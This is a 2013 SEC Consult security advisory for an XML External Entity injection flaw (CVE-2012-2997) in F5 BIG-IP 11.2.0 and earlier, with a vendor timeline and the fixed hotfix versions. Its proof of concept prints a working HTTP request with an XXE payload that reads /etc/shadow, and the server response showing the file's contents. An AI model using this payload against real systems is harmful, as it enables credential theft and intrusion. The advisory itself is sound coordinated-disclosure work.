SEC Consult SA-20130122-0 :: F5 BIG-IP XML External Entity Injection vulnerability

2013-01-2700:00:00

vulners.com

JSON

SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >

          title: XML External Entity Injection &#40;XXE&#41;
        product: F5 BIG-IP

vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-2997
impact: Medium
homepage: http://www.f5.com/
found: 2012-09-03
by: S. Viehbock
SEC Consult Vulnerability Lab
https://www.sec-consult.com

Vendor/product description:

"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility?and ensures your applications
are fast, secure, and available."

URL: http://www.f5.com/products/big-ip/

Vulnerability overview/description:

An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP
component. This enables an authenticated attacker to download arbitrary files
from the file system with the rights of the "apache" OS user. The BIG-IP
configuration even allows access to the critical /etc/shadow file which
contains the password hashes of users.

Proof of concept:

The following exploit shows how files can be extracted from the file system:

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=VALID_COOKIE
Content-Length: 143

<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>

The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:–hash–:15490::::::
bin::15490::::::
daemon::15490::::::
adm::15490::::::
lp::15490::::::
mail::15490::::::
uucp::15490::::::
operator::15490::::::
nobody::15490::::::
tmshnobody:*:15490::::::
admin:–hash–:15490:0:99999:7:::
…

Vulnerable / tested versions:

The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.
No modules have to be enabled for successful exploitation.

Vendor contact timeline:

2012-09-07: Contacting vendor - reqesting PGP/SMIME key.
2012-09-07: Vendor provides case number and PGP key.
2012-09-11: Sending advisory draft and proof of concept.
2012-09-20: Vendor has a fix for the vulnerability - will be released "with
different hot fixes for different releases".
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Solution:

Update to 11.2.0 HF3 or 11.2.1 HF3.

Patch information is also available at:
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html

Workaround:

No workaround available.

Advisory URL:

https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com


EOF S. Viehbock / @2013